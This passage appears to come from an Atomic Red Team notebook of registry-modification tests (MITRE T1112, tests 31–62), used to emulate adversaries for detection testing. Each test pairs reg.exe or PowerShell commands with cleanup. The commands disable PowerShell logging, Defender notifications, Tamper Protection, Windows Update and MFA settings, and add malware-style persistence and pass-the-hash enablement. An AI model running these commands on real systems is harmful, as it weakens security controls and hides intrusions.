Invoke-AtomicTest T1112 -TestNumbers 31

#### Cleanup: 
```cmd
reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v ShowInfoTip /f >nul 2>&1
reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v ShowCompColor /f >nul 2>&1
```

In [ ]:
Invoke-AtomicTest T1112 -TestNumbers 31 -Cleanup

### Atomic Test #32 - Windows Powershell Logging DisabledModify the registry of the currently logged in user using reg.exe via cmd console to disable Powershell Module Logging, Script Block Logging, Transcription and Script Execution
see https://admx.help/?Category=Windows_10_2016&Policy=Microsoft.Policies.PowerShell::EnableModuleLogging
**Supported Platforms:** windows
Elevation Required (e.g. root or admin)#### Attack Commands: Run with `command_prompt`
```command_prompt
reg  add HKCU\Software\Policies\Microsoft\Windows\PowerShell\ModuleLogging /v EnableModuleLogging /t REG_DWORD /d 0 /f
reg  add HKCU\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging /v EnableScriptBlockLogging /t REG_DWORD /d 0 /f
reg  add HKCU\Software\Policies\Microsoft\Windows\PowerShell\Transcription /v EnableTranscripting /t REG_DWORD /d 0 /f
reg  add HKCU\Software\Policies\Microsoft\Windows\PowerShell /v EnableScripts /t REG_DWORD /d 0 /f
REM do a little cleanup immediately to avoid execution issues with later tests
reg delete HKCU\Software\Policies\Microsoft\Windows\PowerShell /v EnableScripts /f >nul 2>&1
```

In [ ]:
Invoke-AtomicTest T1112 -TestNumbers 32

#### Cleanup: 
```cmd
reg delete HKCU\Software\Policies\Microsoft\Windows\PowerShell\ModuleLogging /v EnableModuleLogging /f >nul 2>&1
reg delete HKCU\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging /v EnableScriptBlockLogging /f >nul 2>&1
reg delete HKCU\Software\Policies\Microsoft\Windows\PowerShell\Transcription /v EnableTranscripting /f >nul 2>&1
```

In [ ]:
Invoke-AtomicTest T1112 -TestNumbers 32 -Cleanup

### Atomic Test #33 - Windows Add Registry Value to Load Service in Safe Mode without NetworkModify the registry to allow a driver, service, to persist in Safe Mode.
see https://redcanary.com/blog/tracking-driver-inventory-to-expose-rootkits/ and https://blog.didierstevens.com/2007/03/26/playing-with-safe-mode/ for further details.
Adding a subkey to Minimal with the name of your service and a default value set to Service, makes that your service will be started when you boot into Safe Mode without networking. The same applies for the Network subkey.
**Supported Platforms:** windows
Elevation Required (e.g. root or admin)#### Attack Commands: Run with `command_prompt`
```command_prompt
REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\AtomicSafeMode" /VE /T REG_SZ /F /D "Service"
```

In [ ]:
Invoke-AtomicTest T1112 -TestNumbers 33

#### Cleanup: 
```cmd
reg delete "HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\AtomicSafeMode" /f
```

In [ ]:
Invoke-AtomicTest T1112 -TestNumbers 33 -Cleanup

### Atomic Test #34 - Windows Add Registry Value to Load Service in Safe Mode with NetworkModify the registry to allow a driver, service, to persist in Safe Mode with networking.
see https://redcanary.com/blog/tracking-driver-inventory-to-expose-rootkits/ and https://blog.didierstevens.com/2007/03/26/playing-with-safe-mode/ for further details.
Adding a subkey to Netowrk with the name of your service and a default value set to Service, makes that your service will be started when you boot into Safe Mode with networking.
**Supported Platforms:** windows
Elevation Required (e.g. root or admin)#### Attack Commands: Run with `command_prompt`
```command_prompt
REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\AtomicSafeMode" /VE /T REG_SZ /F /D "Service"
```

In [ ]:
Invoke-AtomicTest T1112 -TestNumbers 34

#### Cleanup: 
```cmd
reg delete "HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\AtomicSafeMode" /f
```

In [ ]:
Invoke-AtomicTest T1112 -TestNumbers 34 -Cleanup

### Atomic Test #35 - Disable Windows Toast NotificationsModify the registry of the currently logged in user using reg.exe via cmd console to disable the windows toast notification.
See how azorult malware abuses this technique- https://app.any.run/tasks/a6f2ffe2-e6e2-4396-ae2e-04ea0143f2d8/
**Supported Platforms:** windows
Elevation Required (e.g. root or admin)#### Attack Commands: Run with `command_prompt`
```command_prompt
reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\PushNotifications /v ToastEnabled /t REG_DWORD /d 0 /f
```

In [ ]:
Invoke-AtomicTest T1112 -TestNumbers 35

#### Cleanup: 
```cmd
reg delete HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\PushNotifications /v ToastEnabled /f >nul 2>&1
```

In [ ]:
Invoke-AtomicTest T1112 -TestNumbers 35 -Cleanup

### Atomic Test #36 - Disable Windows Security Center NotificationsModify the registry of the currently logged in user using reg.exe via cmd console to disable the windows security center notification.
See how azorult malware abuses this technique- https://app.any.run/tasks/a6f2ffe2-e6e2-4396-ae2e-04ea0143f2d8/
**Supported Platforms:** windows
Elevation Required (e.g. root or admin)#### Attack Commands: Run with `command_prompt`
```command_prompt
reg add HKLM\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\ImmersiveShell /v UseActionCenterExperience /t REG_DWORD /d 0 /f
```

In [ ]:
Invoke-AtomicTest T1112 -TestNumbers 36

#### Cleanup: 
```cmd
reg delete HKLM\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\ImmersiveShell /v UseActionCenterExperience /f >nul 2>&1
```

In [ ]:
Invoke-AtomicTest T1112 -TestNumbers 36 -Cleanup

### Atomic Test #37 - Suppress Win Defender NotificationsModify the registry of the currently logged in user using reg.exe via cmd console to suppress the windows defender notification.
See how azorult malware abuses this technique- https://app.any.run/tasks/a6f2ffe2-e6e2-4396-ae2e-04ea0143f2d8/
**Supported Platforms:** windows
Elevation Required (e.g. root or admin)#### Attack Commands: Run with `command_prompt`
```command_prompt
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\UX Configuration" /v Notification_Suppress /t REG_DWORD /d 1 /f
```

In [ ]:
Invoke-AtomicTest T1112 -TestNumbers 37

#### Cleanup: 
```cmd
reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\UX Configuration" /v Notification_Suppress /f >nul 2>&1
```

In [ ]:
Invoke-AtomicTest T1112 -TestNumbers 37 -Cleanup

### Atomic Test #38 - Allow RDP Remote Assistance FeatureModify the registry of the currently logged in user using reg.exe via cmd console to allow rdp remote assistance feature. This feature allow specific
user to rdp connect on the targeted machine.
See how azorult malware abuses this technique- https://app.any.run/tasks/a6f2ffe2-e6e2-4396-ae2e-04ea0143f2d8/
**Supported Platforms:** windows
Elevation Required (e.g. root or admin)#### Attack Commands: Run with `command_prompt`
```command_prompt
reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f
```

In [ ]:
Invoke-AtomicTest T1112 -TestNumbers 38

#### Cleanup: 
```cmd
reg delete "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /f >nul 2>&1
```

In [ ]:
Invoke-AtomicTest T1112 -TestNumbers 38 -Cleanup

### Atomic Test #39 - NetWire RAT Registry Key CreationNetWire continues to create its home key (HKCU\SOFTWARE\NetWire) as well as adding it into the auto-run group in the victim’s registry.
See how NetWire malware - https://app.any.run/tasks/41ecdbde-4997-4301-a350-0270448b4c8f/
**Supported Platforms:** windows#### Attack Commands: Run with `command_prompt`
```command_prompt
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v NetWire /t REG_SZ  /d "C:\Users\admin\AppData\Roaming\Install\Host.exe" /f
reg add HKCU\SOFTWARE\NetWire /v HostId /t REG_SZ /d HostId-kai6Ci /f
reg add HKCU\SOFTWARE\NetWire /v "Install Date" /t REG_SZ /d "2021-08-30 07:17:27" /f
```

In [ ]:
Invoke-AtomicTest T1112 -TestNumbers 39

#### Cleanup: 
```cmd
reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v NetWire /f >nul 2>&1
reg delete HKCU\SOFTWARE\NetWire /va /f >nul 2>&1
reg delete HKCU\SOFTWARE\NetWire /f >nul 2>&1
```

In [ ]:
Invoke-AtomicTest T1112 -TestNumbers 39 -Cleanup

### Atomic Test #40 - Ursnif Malware Registry Key CreationUrsnif downloads additional modules from the C&C server and saves these in the registry folder HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\
More information - https://blog.trendmicro.com/trendlabs-security-intelligence/phishing-campaign-uses-hijacked-emails-to-deliver-ursnif-by-replying-to-ongoing-threads/
**Supported Platforms:** windows#### Attack Commands: Run with `command_prompt`
```command_prompt
reg add HKCU\Software\AppDataLow\Software\Microsoft\3A861D62-51E0-15700F2219A4 /v comsxRes /t REG_BINARY  /d 72656463616e617279 /f
```

In [ ]:
Invoke-AtomicTest T1112 -TestNumbers 40

#### Cleanup: 
```cmd
reg delete HKCU\Software\AppDataLow\Software\Microsoft\3A861D62-51E0-15700F2219A4 /va /f >nul 2>&1
reg delete HKCU\Software\AppDataLow\Software\Microsoft\3A861D62-51E0-15700F2219A4 /f >nul 2>&1
```

In [ ]:
Invoke-AtomicTest T1112 -TestNumbers 40 -Cleanup

### Atomic Test #41 - Terminal Server Client Connection History Cleared
The built-in Windows Remote Desktop Connection (RDP) client (mstsc.exe) saves the remote computer name (or IP address) and the username that is used to login after each successful connection to the remote computer

**Supported Platforms:** windows

Elevation Required (e.g. root or admin)
#### Dependencies:  Run with `powershell`!
##### Description: Must have the "MR9" Remote Desktop Connection history Key 

##### Check Prereq Commands:
```cmd
if ((Get-ItemProperty -Path "HKCU:\SOFTWARE\Microsoft\Terminal Server Client\Default\").MR9) {exit 0} else {exit 1}

```
##### Get Prereq Commands:
```cmd
New-Item -path "HKCU:\SOFTWARE\Microsoft\" -name "Terminal Server Client"  -ErrorAction Ignore
New-Item -path "HKCU:\SOFTWARE\Microsoft\Terminal Server Client\" -name "Default" -ErrorAction Ignore
New-Itemproperty -path "HKCU:\SOFTWARE\Microsoft\Terminal Server Client\Default" -name "MR9" -value "127.0.0.1"  -PropertyType "String" -ErrorAction Ignore
New-Item -path "HKCU:\SOFTWARE\Microsoft\Terminal Server Client\" -name "Servers" -ErrorAction Ignore
New-Item -path "HKCU:\SOFTWARE\Microsoft\Terminal Server Client\Servers" -name "Redcanary" -ErrorAction Ignore

```

In [ ]:
Invoke-AtomicTest T1112 -TestNumbers 41 -GetPreReqs

#### Attack Commands: Run with `command_prompt`
```command_prompt
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /f
```

In [ ]:
Invoke-AtomicTest T1112 -TestNumbers 41

### Atomic Test #42 - Disable Windows Error Reporting SettingsModify the registry of the currently logged in user using reg.exe via cmd console to disable windows error reporting settings. This Windows feature allow the use to report bug, errors, failure or problems 
encounter in specific application or process.
See how azorult malware abuses this technique- https://app.any.run/tasks/a6f2ffe2-e6e2-4396-ae2e-04ea0143f2d8/
**Supported Platforms:** windows
Elevation Required (e.g. root or admin)#### Attack Commands: Run with `command_prompt`
```command_prompt
reg add HKLM64\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting /v DisableEnhancedNotifications /t REG_DWORD /d 1 /f
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting /v DisableEnhancedNotifications /t REG_DWORD /d 1 /f
```

In [ ]:
Invoke-AtomicTest T1112 -TestNumbers 42

#### Cleanup: 
```cmd
reg delete HKLM64\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting /v DisableEnhancedNotifications /f >nul 2>&1
reg delete HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting /v DisableEnhancedNotifications /f >nul 2>&1
```

In [ ]:
Invoke-AtomicTest T1112 -TestNumbers 42 -Cleanup

### Atomic Test #43 - DisallowRun Execution Of Certain ApplicationsModify the registry of the currently logged in user using reg.exe via cmd console to prevent user running specific computer programs that could aid them in manually removing malware or detecting it 
using security product.
**Supported Platforms:** windows
Elevation Required (e.g. root or admin)#### Attack Commands: Run with `command_prompt`
```command_prompt
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v DisallowRun /t REG_DWORD /d 1 /f
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun /f /t REG_SZ /v art1 /d "regedit.exe"
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun /f /t REG_SZ /v art2 /d "cmd.exe"
```

In [ ]:
Invoke-AtomicTest T1112 -TestNumbers 43

#### Cleanup: 
```cmd
reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v DisallowRun /f >nul 2>&1
reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun /v art1 /f >nul 2>&1
reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun /v art2 /f >nul 2>&1
```

In [ ]:
Invoke-AtomicTest T1112 -TestNumbers 43 -Cleanup

### Atomic Test #44 - Enabling Restricted Admin Mode via Command_PromptEnabling Restricted Admin Mode via Command_Prompt,enables an attacker to perform a pass-the-hash attack using RDP.

See [Passing the Hash with Remote Desktop](https://www.kali.org/blog/passing-hash-remote-desktop/)
**Supported Platforms:** windows
Elevation Required (e.g. root or admin)#### Attack Commands: Run with `command_prompt`
```command_prompt
reg add "hklm\system\currentcontrolset\control\lsa" /f /v DisableRestrictedAdmin /t REG_DWORD /d 0
```

In [ ]:
Invoke-AtomicTest T1112 -TestNumbers 44

#### Cleanup: 
```cmd
reg delete "hklm\system\currentcontrolset\control\lsa" /f /v DisableRestrictedAdmin >nul 2>&1
```

In [ ]:
Invoke-AtomicTest T1112 -TestNumbers 44 -Cleanup

### Atomic Test #45 - Mimic Ransomware - Enable Multiple User SessionsThis test emulates Mimic ransomware's ability to enable multiple user sessions by modifying the AllowMultipleTSSessions value within the Winlogon registry key. 
See [Mimic Ransomware Overview] (https://www.trendmicro.com/en_us/research/23/a/new-mimic-ransomware-abuses-everything-apis-for-its-encryption-p.html)
**Supported Platforms:** windows
Elevation Required (e.g. root or admin)#### Attack Commands: Run with `command_prompt`
```command_prompt
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Winlogon /t REG_DWORD /v AllowMultipleTSSessions /d 1 /f
```

In [ ]:
Invoke-AtomicTest T1112 -TestNumbers 45

#### Cleanup: 
```cmd
reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Winlogon /v AllowMultipleTSSessions /f >nul 2>&1
```

In [ ]:
Invoke-AtomicTest T1112 -TestNumbers 45 -Cleanup

### Atomic Test #46 - Mimic Ransomware - Allow Multiple RDP Sessions per UserThis test emulates Mimic ransomware's ability to enable multiple RDP sessions per user by modifying the fSingleSessionPerUser value within the Terminal Server registry key. 
See [Mimic Ransomware Overview] (https://www.trendmicro.com/en_us/research/23/a/new-mimic-ransomware-abuses-everything-apis-for-its-encryption-p.html)
**Supported Platforms:** windows
Elevation Required (e.g. root or admin)#### Attack Commands: Run with `command_prompt`
```command_prompt
reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fSingleSessionPerUser /t REG_DWORD /d 0 /f
```

In [ ]:
Invoke-AtomicTest T1112 -TestNumbers 46

#### Cleanup: 
```cmd
reg delete "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fSingleSessionPerUser /f >nul 2>&1
```

In [ ]:
Invoke-AtomicTest T1112 -TestNumbers 46 -Cleanup

### Atomic Test #47 - Event Viewer Registry Modification - Redirection URLModify event viewer registry values to alter the behavior of the online help redirection. Upon opening an event in event viewer and attempting to view the help page for the event, it will open the URL or execute the program defined in the redirection URL registry entry.**Supported Platforms:** windows
Elevation Required (e.g. root or admin)#### Attack Commands: Run with `command_prompt`
```command_prompt
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Event Viewer" /v MicrosoftRedirectionURL /t REG_SZ /d "file://C:\windows\system32\notepad.exe" /f```

In [ ]:
Invoke-AtomicTest T1112 -TestNumbers 47

#### Cleanup: 
```cmd
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Event Viewer" /v MicrosoftRedirectionURL /t REG_SZ /d "http://go.microsoft.com/fwlink/events.asp" /f```

In [ ]:
Invoke-AtomicTest T1112 -TestNumbers 47 -Cleanup

### Atomic Test #48 - Event Viewer Registry Modification - Redirection ProgramModify event viewer registry values to alter the behavior of the online help redirection. Upon opening an event in event viewer and attempting to view the help page for the event, it will execute the program defined in the redirection program registry entry.**Supported Platforms:** windows
Elevation Required (e.g. root or admin)#### Attack Commands: Run with `command_prompt`
```command_prompt
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Event Viewer" /v MicrosoftRedirectionProgram /t REG_EXPAND_SZ /d "C:\windows\system32\notepad.exe" /f```

In [ ]:
Invoke-AtomicTest T1112 -TestNumbers 48

#### Cleanup: 
```cmd
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Event Viewer" /v MicrosoftRedirectionProgram /t REG_EXPAND_SZ /f```

In [ ]:
Invoke-AtomicTest T1112 -TestNumbers 48 -Cleanup

### Atomic Test #49 - Enabling Remote Desktop Protocol via Remote RegistryEnabling RDP through remote registry.
**Supported Platforms:** windows
Elevation Required (e.g. root or admin)#### Attack Commands: Run with `command_prompt`
```command_prompt
reg add "hklm\SYSTEM\CurrentControlSet\Control\Terminal Server\Winstations\RDP-Tcp" /v SecurityLayer /t REG_DWORD /d 0 /f
```

In [ ]:
Invoke-AtomicTest T1112 -TestNumbers 49

#### Cleanup: 
```cmd
reg add "hklm\SYSTEM\CurrentControlSet\Control\Terminal Server\Winstations\RDP-Tcp" /v SecurityLayer /t REG_DWORD /d 2 /f
```

In [ ]:
Invoke-AtomicTest T1112 -TestNumbers 49 -Cleanup

### Atomic Test #50 - Disable Win Defender NotificationDisable Win Defender Notification. Redline is using this to disable this win defender feature.
**Supported Platforms:** windows
Elevation Required (e.g. root or admin)#### Attack Commands: Run with `command_prompt`
```command_prompt
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications" /v "DisableNotifications" /t REG_DWORD /d 1 /f
```

In [ ]:
Invoke-AtomicTest T1112 -TestNumbers 50

#### Cleanup: 
```cmd
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications" /v "DisableNotifications" /t REG_DWORD /d 0 /f
```

In [ ]:
Invoke-AtomicTest T1112 -TestNumbers 50 -Cleanup

### Atomic Test #51 - Disable Windows OS Auto UpdateDisable Auto Update Windows OS feature. Redline is using this as part of its defense evasion.
**Supported Platforms:** windows
Elevation Required (e.g. root or admin)#### Attack Commands: Run with `command_prompt`
```command_prompt
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU" /v "NoAutoUpdate" /t REG_DWORD /d 1 /f
```

In [ ]:
Invoke-AtomicTest T1112 -TestNumbers 51

#### Cleanup: 
```cmd
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU" /v "NoAutoUpdate" /t REG_DWORD /d 0 /f
```

In [ ]:
Invoke-AtomicTest T1112 -TestNumbers 51 -Cleanup

### Atomic Test #52 - Disable Windows Auto Reboot for current logon userDisable Windows Auto Reboot for current logon user. Redline is using this as part of its defense evasion.
**Supported Platforms:** windows
Elevation Required (e.g. root or admin)#### Attack Commands: Run with `command_prompt`
```command_prompt
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU" /v "NoAutoRebootWithLoggedOnUsers" /t REG_DWORD /d 1 /f
```

In [ ]:
Invoke-AtomicTest T1112 -TestNumbers 52

#### Cleanup: 
```cmd
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU" /v "NoAutoRebootWithLoggedOnUsers" /t REG_DWORD /d 0 /f
```

In [ ]:
Invoke-AtomicTest T1112 -TestNumbers 52 -Cleanup

### Atomic Test #53 - Windows Auto Update Option to Notify before downloadWindows Auto Update Option to Notify before download. Redline is using this as part of its defense evasion.
**Supported Platforms:** windows
Elevation Required (e.g. root or admin)#### Attack Commands: Run with `command_prompt`
```command_prompt
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU" /v "AUOptions" /t REG_DWORD /d 2 /f
```

In [ ]:
Invoke-AtomicTest T1112 -TestNumbers 53

#### Cleanup: 
```cmd
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU" /v "AUOptions" /t REG_DWORD /d 3 /f
```

In [ ]:
Invoke-AtomicTest T1112 -TestNumbers 53 -Cleanup

### Atomic Test #54 - Do Not Connect To Win UpdateDo Not Connect To Win Update. Redline is using this as part of its defense evasion.
**Supported Platforms:** windows
Elevation Required (e.g. root or admin)#### Attack Commands: Run with `command_prompt`
```command_prompt
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate" /v "DoNotConnectToWindowsUpdateInternetLocations" /t REG_DWORD /d 1 /f
```

In [ ]:
Invoke-AtomicTest T1112 -TestNumbers 54

#### Cleanup: 
```cmd
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate" /v "DoNotConnectToWindowsUpdateInternetLocations" /t REG_DWORD /d 0 /f
```

In [ ]:
Invoke-AtomicTest T1112 -TestNumbers 54 -Cleanup

### Atomic Test #55 - Tamper Win Defender ProtectionTamper Win Defender Protection. RedLine Stealer is executing another component file to modify this win defender feature in registry. 
Take note that this modification might not be enough to disable this feature but can be a good indicator of malicious process that 
tries to tamper this Win Defender feature settings.
**Supported Platforms:** windows
Elevation Required (e.g. root or admin)#### Attack Commands: Run with `command_prompt`
```command_prompt
reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtection" /t REG_DWORD /d 0 /f
```

In [ ]:
Invoke-AtomicTest T1112 -TestNumbers 55

#### Cleanup: 
```cmd
reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtection" /t REG_DWORD /d 5 /f
```

In [ ]:
Invoke-AtomicTest T1112 -TestNumbers 55 -Cleanup

### Atomic Test #56 - Snake Malware Registry BlobThe following Atomic Test creates a registry blob in HKLM:\SOFTWARE\Classes\.wav\OpenWithProgIds, which is related to Snake Malware. Per the report, upon execution, Snake's WerFault.exe will attempt to decrypt an encrypted blob within the Windows
registry that is typically found at HKLM:\SOFTWARE\Classes\.wav\OpenWithProgIds. The encrypted data includes the AES key, IV, and path that is used to find and decrypt the file containing Snake's kernel driver and kernel driver loader.
**Supported Platforms:** windows
Elevation Required (e.g. root or admin)#### Attack Commands: Run with `powershell`
```powershell
$typicalPath = "HKLM:\SOFTWARE\Classes\.wav\OpenWithProgIds"; $randomBytes = New-Object Byte[] 0x1000; (New-Object Random).NextBytes($randomBytes); New-ItemProperty -Path $typicalPath -Name "AtomicSnake" -Value $randomBytes -PropertyType Binary -Force | Out-Null
```

In [ ]:
Invoke-AtomicTest T1112 -TestNumbers 56

#### Cleanup: 
```powershell
$typicalPath = "HKLM:\SOFTWARE\Classes\.wav\OpenWithProgIds"; Remove-ItemProperty -Path $typicalPath -Name "AtomicSnake" -ErrorAction SilentlyContinue | Out-Null
```

In [ ]:
Invoke-AtomicTest T1112 -TestNumbers 56 -Cleanup

### Atomic Test #57 - Allow Simultaneous Download RegistryA registry modification to allow Simultaneous download in the system.
**Supported Platforms:** windows
Elevation Required (e.g. root or admin)#### Attack Commands: Run with `command_prompt`
```command_prompt
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v "MaxConnectionsPerServer" /t REG_DWORD /d 10 /f
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v "MaxConnectionsPer1_0Server" /t REG_DWORD /d 10 /f
```

In [ ]:
Invoke-AtomicTest T1112 -TestNumbers 57

#### Cleanup: 
```cmd
reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v "MaxConnectionsPerServer" /f
reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v "MaxConnectionsPer1_0Server" /f
```

In [ ]:
Invoke-AtomicTest T1112 -TestNumbers 57 -Cleanup

### Atomic Test #58 - Modify Internet Zone Protocol Defaults in Current User Registry - cmdThis test simulates an adversary modifying the Internet Zone Protocol Defaults in the registry of the currently logged-in user using the reg.exe utility via the command prompt. Such modifications can be indicative of an adversary trying to weaken browser security settings. Upon execution, if successful, the message "The operation completed successfully." will be displayed.
To verify the effects of the test:
1. Open the Registry Editor (regedit.exe).
2. Navigate to "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults".
3. Check for the presence of the "http" and "https" DWORD values set to `0`.
Or run:
```batch
reg query "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults"
```
**Supported Platforms:** windows#### Attack Commands: Run with `command_prompt`
```command_prompt
reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults" /v http /t REG_DWORD /d 0 /F
reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults" /v https /t REG_DWORD /d 0 /F
```

In [ ]:
Invoke-AtomicTest T1112 -TestNumbers 58

#### Cleanup: 
```cmd
reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults" /v http /t REG_DWORD /d 3 /F
reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults" /v https /t REG_DWORD /d 3 /F
```

In [ ]:
Invoke-AtomicTest T1112 -TestNumbers 58 -Cleanup

### Atomic Test #59 - Modify Internet Zone Protocol Defaults in Current User Registry - PowerShellThis test simulates an adversary modifying the Internet Zone Protocol Defaults in the registry of the currently logged-in user using PowerShell. Such modifications can be indicative of an adversary attempting to weaken browser security settings. 
To verify the effects of the test:
1. Open the Registry Editor (regedit.exe).
2. Navigate to "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults".
3. Check for the presence of the "http" and "https" DWORD values set to `0`.
Or run:
```powershell
Get-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults' | Select-Object http,https
```
**Supported Platforms:** windows#### Attack Commands: Run with `powershell`
```powershell
# Set the registry values for http and https to 0
Set-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults' -Name 'http' -Value 0
Set-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults' -Name 'https' -Value 0
```

In [ ]:
Invoke-AtomicTest T1112 -TestNumbers 59

#### Cleanup: 
```powershell
# Restore the registry values for http and https to 3
Set-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults' -Name 'http' -Value 3
Set-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults' -Name 'https' -Value 3
```

In [ ]:
Invoke-AtomicTest T1112 -TestNumbers 59 -Cleanup

### Atomic Test #60 - Activities To Disable Secondary Authentication Detected By Modified Registry Value.Detect the disable secondary authentication activities that adversary attempt to bypass MFA and to get the unauthorized access to the system or sensitive data.
See the related article (https://admx.help/?Category=Windows_10_2016&Policy=Microsoft.Policies.SecondaryAuthenticationFactor::MSSecondaryAuthFactor_AllowSecondaryAuthenticationDevice).
**Supported Platforms:** windows#### Attack Commands: Run with `command_prompt`
```command_prompt
reg add "HKLM\SOFTWARE\Policies\Microsoft\SecondaryAuthenticationFactor" /v "AllowSecondaryAuthenticationDevice" /t REG_DWORD /d 0 /f
```

In [ ]:
Invoke-AtomicTest T1112 -TestNumbers 60

#### Cleanup: 
```cmd
reg add "HKLM\SOFTWARE\Policies\Microsoft\SecondaryAuthenticationFactor" /v "AllowSecondaryAuthenticationDevice" /t REG_DWORD /d 1 /f
```

In [ ]:
Invoke-AtomicTest T1112 -TestNumbers 60 -Cleanup

### Atomic Test #61 - Activities To Disable Microsoft [FIDO Aka Fast IDentity Online] Authentication Detected By Modified Registry Value.Detect the Microsoft FIDO authentication disable activities that adversary attempt to gains access to login credentials (e.g., passwords), they may be able to impersonate the user and access sensitive accounts or data and also increases the risk of falling victim to phishing attacks.
See the related article (https://admx.help/?Category=Windows_10_2016&Policy=Microsoft.Policies.FidoAuthentication::AllowFidoDeviceSignon).
**Supported Platforms:** windows#### Attack Commands: Run with `command_prompt`
```command_prompt
reg add "HKLM\SOFTWARE\Policies\Microsoft\FIDO" /v "AllowExternalDeviceSignon" /t REG_DWORD /d 0 /f
```

In [ ]:
Invoke-AtomicTest T1112 -TestNumbers 61

#### Cleanup: 
```cmd
reg add "HKLM\SOFTWARE\Policies\Microsoft\FIDO" /v "AllowExternalDeviceSignon" /t REG_DWORD /d 1 /f
```

In [ ]:
Invoke-AtomicTest T1112 -TestNumbers 61 -Cleanup

### Atomic Test #62 - Scarab Ransomware Defense Evasion ActivitiesScarab Ransomware defense evasion activities that can abuse the registry values to modify the settings of the Credential Security Support Provider to overcome potential RDP connection issues.
